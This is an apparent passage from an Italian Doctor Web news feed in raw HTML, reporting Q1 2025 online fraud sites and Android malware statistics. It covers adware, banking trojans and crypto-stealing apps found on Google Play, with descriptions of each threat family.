        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Gli abitanti di Russia e Kirghizistan si imbattevano nei simili siti — presumibilmente potrebbero guadagnare sul trading sul petrolio e gas:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Mentre un'altra risorsa internet fraudolenta invitava gli utenti rumeni a unirsi al progetto del gasdotto BRUA e prometteva 3000 lei a settimana come reddito passivo:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Continuano a essere un'esca per le potenziali vittime i siti che promettono un sostegno governativo alla popolazione sotto forma di sussidi, 
    bonus sociali ecc. Così, i malintenzionati cercavano ad attirare gli utenti russi verso ennesime falsificazioni del portale web dei servizi 
    statali Gosuslugi. Su uno di questi siti veniva suggerito di fornire i dati personali presumibilmente per partecipare a un programma di pagamenti 
    da una compagnia petrolifera e del gas, e inoltre, per ricevere bonus dal governo:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un altro sito fraudolento prometteva a ciascun abitante di Kazakistan un sussidio sotto forma di pagamenti presumibilmente a nome di una grande banca 
    "al fine di evitare problemi e disastri":
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Non perdono di attualità neanche i falsi siti di servizi di investimento — in particolare, delle istituzioni creditizie russe. 
    Molti di tali siti si mimetizzano da veri portali web di banche per confondere il più possibile le potenziali vittime.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Esempi di falsi siti di banche russe che suggeriscono di ottenere l'accesso a "servizi di investimento"
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h2&gt;
    &lt;p&gt;
      Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, le minacce Android più diffuse 
      nel I trimestre 2025 sono stati i trojan pubblicitari 
      &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, 
      nonché i programmi malevoli falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Rispetto al quarto trimestre dell'anno scorso, 
      la loro attività è aumentata. Oltre a ciò, gli utenti riscontravano più frequentemente i trojan bancari 
      &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. I trojan spia &lt;b&gt;Android.SpyMax&lt;/b&gt;, 
      il cui numero di attacchi nel 2024 aumentava quasi ogni mese, al contrario, venivano rilevati sui dispositivi protetti meno spesso.
    &lt;/p&gt;
    &lt;p&gt;
      I nostri specialisti di nuovo hanno individuato molteplici minacce sullo store di app Google Play. Tra di esse sono i trojan 
      utilizzati in vari schemi di frode, i programmi malevoli per il furto di criptovalute, nonché i trojan pubblicitari.
    &lt;/p&gt;
    &lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in I trimestre:&lt;/p&gt;
    &lt;ul&gt;
      &lt;li&gt;Aumento dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
      &lt;li&gt;Aumento dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
      &lt;li&gt;Diminuito il numero di attacchi dei programmi spia &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
      &lt;li&gt;Rilevamento di nuove minacce sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel I trimestre 2025 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?lng=it&amp;i=14991" target="_blank"&gt;panoramica&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14991&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in I trimestre 2025</title><link>https://news.drweb-av.it/show/?i=14991&amp;lng=it&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;27 marzo 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel I trimestre 2025 i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; sono rimasti i programmi malevoli per SO Android più diffusi. Rispetto al IV trimestre scorso, i loro rilevamenti sui dispositivi protetti sono stati più del doppio.  Il secondo posto hanno ottenuto le applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizzate dai malintenzionati in vari schemi fraudolenti; la loro attività è aumentata di quasi 8%. Terzi si sono classificati i trojan pubblicitari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; — il loro numero di rilevamenti è cresciuto di quasi 5 volte.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Una simile dinamica veniva osservata anche tra molti trojan bancari. Così, è stata registrata una crescita del numero di attacchi da parte dei campioni delle famiglie 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — del 20,68% e 151,71% rispettivamente. Allo stesso tempo, i trojan &lt;b&gt;Android.SpyMax&lt;/b&gt;, 
        la cui attività cresceva quasi per tutto il 2024, venivano rilevati il 41,94% in meno rispetto al trimestre prima.
    &lt;/p&gt;
    &lt;p&gt;
        Durante gli ultimi 3 mesi, gli specialisti Doctor Web hanno individuato decine di nuove minacce informatiche sullo store di app Google Play. 
        Accanto a un numero di trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; tradizionalmente alto, il nostro laboratorio dei virus ha registrato lì i programmi malevoli per 
        il furto di criptovalute, nonché gli ennesimi trojan che visualizzano annunci invadenti.
    &lt;/p&gt;
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;PRINCIPALI TENDENZE DI I TRIMESTRE&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Crescita dell'attività dei trojan pubblicitari&lt;/li&gt;
            &lt;li&gt;Aumento del numero di attacchi dei banker &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Calo dell'attività dei trojan spia &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
            &lt;li&gt;Su Google Play comparse molteplici nuove applicazioni malevole&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h2&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" alt="Malware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano nelle applicazioni.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" alt="Unwanted_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare una somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di programmi adware che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web com &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" alt="Riskware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di una serie di versioni potenzialmente pericolose di un framework specializzato per lo sviluppo di programmi Android nel linguaggio di programmazione di scripting Lua. La logica principale di applicazioni Lua è situata in script corrispondenti che sono cifrati e vengono decifrati dall'interprete prima dell'esecuzione. Spesso questo framework di default chiede l'accesso a un gran numero di autorizzazioni di sistema per il funzionamento. Come risultato, gli script Lua eseguiti attraverso di esso sono in grado di effettuare varie azioni malevole in base alle autorizzazioni ricevute.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Piattaforma software potenzialmente pericolosa che consente alle applicazioni di avviare i file APK senza la loro installazione. Questa piattaforma crea un ambiente di esecuzione virtuale nel contesto delle applicazioni in cui è incorporata. I file APK avviati tramite di esse possono funzionare come se facessero parte di tali programmi e ricevere automaticamente le stesse autorizzazioni.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Utility packer specializzata per la protezione di applicazioni Android dalla modifica e dal reverse engineering. Non è malevola, ma può essere utilizzata per la protezione di programmi sia innocui che trojan.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" alt="Adware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di alcune versioni modificate (mods) dell'app di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per caricare i link di destinazione tramite web view durante l'utilizzo dell'app. Da questi indirizzi internet viene eseguito il reindirizzamento verso i siti pubblicizzati — ad esempio, casinò online e scommesse, siti per adulti.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Applicazioni che visualizzano annunci pubblicitari indesiderati che spesso portano a siti malevoli e truffaldini. Hanno una base di codice comune con i programmi indesiderati &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Moduli adware che possono essere integrati in programmi Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questi moduli raccolgono una serie di dati riservati, nonché sono in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Modulo adware che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Minacce su Google Play&lt;/h2&gt;
    &lt;p&gt;
        Nel I trimestre 2025, il laboratorio dei virus dell'azienda Doctor Web ha individuato su Google Play diverse decine di applicazioni malevole. 
        Tra di esse sono diverse varianti dei trojan 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, che nascondono la propria presenza sui dispositivi infetti 
        e iniziano a visualizzare pubblicità sopra altri programmi e l'interfaccia del sistema operativo. Erano nascosti in applicazioni per la ripresa 
        di foto e video con effetti vari, di fotoritocco, una raccolta di immagini e un diario di salute della donna.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, nascosti in programmi Time Shift Cam e Fusion Collage Editor
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Inoltre, i nostri specialisti hanno rilevato i programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; e 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, che sono progettati per il furto di criptovalute e venivano distribuiti sotto false apparenze di software ufficiali 
        delle piattaforme blockchain Raydium e Aerodrome Finance, nonché dello scambio di criptovalute Dydx.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Programmi Raydium e Dydx Exchange — trojan per furti di criptovalute
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        All'avvio le applicazioni malevole invitano le potenziali vittime a inserire una frase mnemonica (seed phrase) presumibilmente 
        per connettere un portafoglio crypto, ma in realtà, i dati inseriti vengono trasmessi ai malintenzionati. Per fuorviare gli utenti 
        completamente, i moduli per l'inserimento delle frasi mnemoniche possono essere mascherati come richieste da parte di altre piattaforme 
        crypto. Come è mostrato nell'esempio sottostante, &lt;a href="https://vms.drweb-av.it/search/?q=Android.CoinSteal&amp;lng=it"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt; 
        ha visualizzato un modulo di phishing presumibilmente a nome dello scambio di criptovalute PancakeSwap.
    &lt;/p&gt;
    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
